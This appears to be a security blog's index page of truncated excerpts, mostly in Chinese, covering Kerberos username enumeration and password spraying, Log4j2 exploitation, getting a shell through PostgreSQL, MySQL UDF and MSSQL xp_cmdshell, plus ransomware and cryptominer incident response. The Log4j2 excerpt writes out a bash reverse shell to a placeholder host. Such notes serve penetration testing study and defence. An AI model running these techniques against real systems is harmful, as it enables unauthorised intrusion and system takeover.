摘要:
在无域内有效凭证的情况下,枚举出域内存在的用户名,在对其进行密码喷洒获得域内有效凭证 利用原理:kerberos认证的as-req阶段,请求包cname对应的值是用户名。当用户状态分别为 1.用户存在且启用 KDC_ERR_PREAUTH_REQUIRED 2.用户存在但禁用 KDC_ERR_CLI 阅读全文
摘要:
漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti 阅读全文
摘要:
postgresql basis the system catalog tables of psotgresql include the following tables: pg_databases:contains information about all databases, such as 阅读全文
摘要:
/sys/class/dmi/id是一个linux系统的目录,用于存储有关计算机硬件的DMI(desktop management interface)信息。DMI是一种由系统固件提供的标准接口,收集和报告有关计算机硬件配置的信息 /sys/class/dmi/id 目录下,可以找到以下文件和子目录 阅读全文
摘要:
有比较多的安全设备或者web系统使用postgresql作为数据库,研究postgresql数据库如何getshell将有很大帮助 外联 postgresql 默认本地连接(5432端口),远程连接需要找到postgres安装目录下的/data/pg_hba.conf,在IPv4配置处加上: hos 阅读全文
摘要:
原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。 思路 获取udf文件 上传udf到指定 阅读全文
摘要:
形成原因 勒索软件通过RDP进入内网进行投放 处置 勒索信息确认 通过勒索页面信息(留下的邮箱或关键字)等信息通过互联网搜索可定位到勒索家族。如被加密后缀为devos,eking,dewar,ban,adage等都是phobos家族 可以重点排查端口映射情况和代理工具搭建情况,如果中勒索的机器有将3 阅读全文
摘要:
特征现象 挖矿服务器的CPU或GPU占用率居高不下 挖矿程序图标举例:(门罗币)。 外连矿池地址,矿池地址一般含有pool、xmr、eth、bth等字符 钱包地址类似:43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8 阅读全文
摘要:
xp_cmdshell 1.conditions exist xp_cmdshell component must have sa password (the highest authority) 2.usage start xp_cmdshell exec sp_configure 'show a 阅读全文
摘要:
start of namp it's bannber tells us it's apache also running debian and more importatntly we get a php session cookie id back so chances are this is g 阅读全文